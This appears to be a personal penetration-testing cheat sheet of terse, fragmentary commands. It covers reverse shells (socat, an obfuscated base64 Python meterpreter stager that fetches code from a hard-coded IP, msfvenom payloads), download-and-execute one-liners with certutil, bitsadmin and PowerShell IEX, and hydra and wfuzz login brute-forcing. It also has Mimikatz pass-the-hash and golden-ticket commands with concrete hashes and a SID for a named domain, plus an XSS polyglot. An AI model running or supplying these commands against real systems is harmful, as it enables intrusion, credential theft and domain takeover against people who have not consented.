- In the hosting machine
>> sudo tightvncserver -geometry 1024x768
In the VNC host machine
ssh -L 5901:localhost:5901 -i .ssh/<ssh key> -N -f <ssh_user>@<machine_ip_OR_machine_url>
socat TCP-L:9999,fork,reuseaddr PROXY:,proxyport=3128 ssh [email protected] -p 9999
proxytunnel -p -d -a 5555 ssh [email protected] -p 5555
http 3128 proxychains ssh [email protected]
ssh [email protected] -t /bin/sh
- port fullscan - UDP scan
- dirsearch big.txt -e sh,txt,htm,php,cgi,html,pl,bak,old - banner inspection - review source code - bruteforce with cewl-based dictionary - searchsploit look at versions properly - test all the paths with the exploits, mangle it - nmap --script vuln - nmap --script safe (ssl-cert, virtual hosts) - always incercept with Burp - nikto -h - LFI, RFI, SQL, RCE, XXE, SSRF injections - PUT method all directories - Change POST body encoding with Burp - Bruteforce parameter names - dirsearch with cookie once authenticated - download vulnerable application from exploit-db and examine it
- shellshock - bruteforce - user_enum - Debian OpenSSL Predictable PRNG
- nmap --script vuln - nmap --script smb* - nmap --script smb-enum-shares,smb-ls - enum4linux
- change shellcode - make sure all badchars are removed - read the exploit properly in case this makes changes in the shellcode - capture traffic with wireshark making sure the entire shellcode is transmited - run the exploit several times - make sure the JMP ESP matches OS and language
- snmpcheck - snmpenum
test: simple shell:
file upload: ```'); ?>``` file upload evasion: rot13 + urlencode
- All pentest monkey reverse shells: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - msfvenom x86/linux/shell_reverse_tcp -f elf - Metasploit
module - which wget | nc
search for response on HTML source code
use payload/python/meterpreter/reverse_http
python -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnUHJveHlIYW5kbGVyJ10pCmhzPVtdCmhzLmFwcGVuZCh1bC5Qcm94eUhhbmRsZXIoeydodHRwJzonaHR0cDovLzE5Mi4xNjguMTA3LjIzMjo4MDgwJ30pKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cDovLzE3OC42Mi41OC4zNTo4MC9qOTkzQScpLnJlYWQoKSkK')))"
Finally we set up the handler:
Linux: https://github.com/lucyoa/kernel-exploits Windows: https://github.com/abatchy17/WindowsExploits
- sudo -l - Kernel Exploits - OS Exploits - Password reuse (mysql, .bash_history, 000-default.conf...) - Known binaries with suid flag and interactive (nmap) - Custom binaries with suid flag either using other binaries or with command execution - Writable files owned by root that get executed (cronjobs) - MySQL as root - Vulnerable services (chkrootkit, logrotate) - Writable /etc/passwd - Readable .bash_history - SSH private key - Listening ports on localhost - /etc/fstab - /etc/exports - /var/mail - Process as other user (root) executing something you have permissions to modify - SSH public key + Predictable PRNG - apt update hooking (Pre-Invoke)
- Kernel Exploits - OS Exploits - Pass The Hash - Password reuse - DLL hijacking (Path) - Vulnerable services - Writable services binaries path - Unquoted services - Listening ports on localhost - Registry keys
bitsadmin bitsadmin /transfer debjob /download /priority normal http://<ip>/shell.php c:\xampp\htdocs\shell.php
cscript wget.vbs (code on the repo) cscript wget.vbs http://<ip>/test.txt test.txt
powershell powershell -c "(new-object System.Net.WebClient).Downloadfile('http://<ip>/exploit.exe', 'C:\Windows\temp\exploit.txt')"
ftp client:
echo open 2121 > ftpscript.txt echo anonymous>> ftpscript.txt echo PASS >> ftpscript.txt echo bin >> ftpscript.txt echo get meter.exe>> ftpscript.txt echo quit >> ftpscript.txt ftp -s:ftpscript.txt
server: python -m pyftpdlib --port=2121 --write
wget.exe Upload to vulnerable server from kali: /usr/share/windows-binaries/wget.exe
wget.exe http://<ip>/file file
certutil certutil -urlcache -split -f https://<ip>/file.txt file.txt
zip fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip
unshadow passwd shadow > passwords john --wordlist=/usr/share/wordlists/rockyou.txt passwords
keepass2john /root/Desktop/NewDatabase.kdb > file john -incremental:alpha -format=keepass file
wfuzz POST wfuzz --hc 404 -c -z list,admin -z file,/root/Documents/SecLists/Passwords/korelogic-password.txt -d "user=FUZZ&password=FUZ2Z"
hydra POST hydra -s 80 http-form-post "/admin/index.php:user=^USER^&password=^PASS^:Moved Temporarily" -l admin -P /root/Documents/SecLists/Passwords/korelogic-password.txt -t 20
wfuzz NTLM wfuzz -c --ntlm "admin:FUZZ" -z file,/root/Documents/SecLists/Passwords/darkc0de.txt --hc 401 https://<ip>/api
wfuzz Basic Auth through Proxy wfuzz -c --hc 404,400,401 -z file,/root/Documents/Audits/ActivosProduban/names.txt -z file,/root/Documents/Audits/ActivosProduban/names.txt --basic "FUZZ:FUZ2Z" -p https://<ip>/api/v1/
For this technique, it is necessary to be able to upload a file to a webserver. 1. reGeorg File upload to the server correct Tunnel creation
python reGeorgSocksProxy.py -p 5555 -u "http://<ip>/admin/uploads/reGeorg.jsp"
Proxychains config
proxychains nmap -F -sT proxychains mysql -u root -p -h proxychains ssh localhost
Reference: https://sensepost.com/discover/tools/reGeorg/ 2. ABBTTS Upload File
Config proxychains and create the tunnel
python abpttsclient.py -c tomcat_walkthrough/config.txt -u -f
Usage ssh -p 22222 [email protected]
Reference: https://github.com/nccgroup/ABPTTS
Attacker: socat file:`tty`,raw,echo=0 TCP-L:4444
Victim: wget -q -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:
Socat Binary: https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
Bypass Applocker 1. rundll32 rundll32.exe PowerShdll.dll,main
Reference: https://github.com/p3nt4/PowerShdll 2. Alternative powershell files
Runas Powershell Start-Process powershell.exe -Verb runas
Start-Process powershell.exe -Credential <user>
View Shares With Permissions
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-ShareFinder -CheckShareAccess"
View files that contain certain words recursively
ls -Path \\SVHOST1.LAZULI.CORP\tmp$ -Include "*pass*","* admin*","*secret*" -Recurse
View files which name contains certain words recursively
ls -Path \\SVHOST1.LAZULI.CORP -Include "*pass*","*admin*","*secret*" -Recurse
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/michaellwest/PowerShell-Modules/master/CorpApps/Invoke-SqlCommand.ps1') Invoke-SqlCommand -Server -Database master -Username sa -Password -Query "exec sp_databases"
Port Scanning
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1') Invoke-Portscan -Hosts -TopPorts 50
net groups /domain "Domain Admins"
nltest /dclist:
IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz
Pass The Hash with Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:adm_maint /ntlm:cbe55f143fcb6d4687583af520123b89 /domain:lazuli"'
Generate Golden Ticket (Domain Admin Required)
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:LAZULI.CORP /user:krbtgt"'
Invoke-Mimikatz -Command '"kerberos::golden /user:adon /domain:LAZULI.CORP /krbtgt:ca1c2aeda9160094be9971bdc21c50aa /sid:S-1-5-21-1238634245-2147606590-2801756923 /id:500 /ticket:admin.kirbi /ptt"
Invoke-Mimikatz -Command '"kerberos::ptt admin.kirbi"'
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1') Invoke-WMIExec -Target SVHOST2 -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell whoami | out-file \\SVHOST2\C$\windows\bitch.txt"
Invoke Mimikatz Remotely
Invoke-WMIExec -Target SVHOST2 -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell -Enc SQBFA...AoA"
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes
Check Pass The Hash with multiple servers
$hosts = @("SVDC1.LAZULI.CORP","SVFILES.LAZULI.CORP","SVHOST1.LAZULI.CORP","SVHOST2.LAZULI.CORP","SVFILES2.LAZULI.CORP") foreach ($h in $hosts){ Invoke-WMIExec -Target $h -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "hostname" -Verbose }
References: https://www.hacklikeapornstar.com/
openconnect vpnXXX02.XXXX.com -u XX -s ‘vpn-slice XXX.46.0.0/16 hostname3 mantis=XXX.46.224.68’
Reference: https://github.com/dlenski/vpn-slice
Traffic forward over SSH without needing to ssh -D <port>
sshuttle -vr [email protected]
Reference: http://teohm.com/blog/using-sshuttle-in-daily-work/
Download from apache directory list wget -m -np http://eamos.pf.jcu.cz/amos/kat_inf/externi/
$ nmap -p- -oA nmap.tcp $ nmap -sU -p- -oA nmap.udp
$ ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -e php -u
$ python -c import pty; pty.spawn("/bin/sh")
$ stty raw -echo
LinEnum.sh linuxprivchecker.py unixprivesc.sh
./dirsearch.py -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -f -r
sqlmap -r /tmp/req.txt -v -a --level 4 --risk 3
hydra -s 42159 http-form-post "/index.php:password=^PASS^:Invalid password!" -l '' -P /usr/share/wordlists/seclists/Passwords/rockyou-75.txt -t 10 -w 30 -o hydra-http-post-attack.txt
nmap -sS -A -PN -p- --script=http-title dontscanme.bro
hydra -s 42181 http-form-post "/main/index.php:name1=^USER^&name2=^PASS^:Wrong Credentials baby!" -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/seclists/Passwords/rockyou-75.txt -t 10 -w 30 -o /tmp/hydra-http-post-attack.txt;alert(String.fromCharCode(88,83,83))//%27;alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E<script>window.onload=function(){eval(window.atob('ZXZhbChhbGVydCgxKSk7Cg=='))}</script>[%27al\u0065rt%27](1337)%22
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -x '.php' -e -t 25
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -e -t 25
use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST set LPORT 5555 set ExitOnSession false exploit -j -z
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=5555> -f raw > shell.php
python -c 'import pty; pty.spawn("/bin/bash")'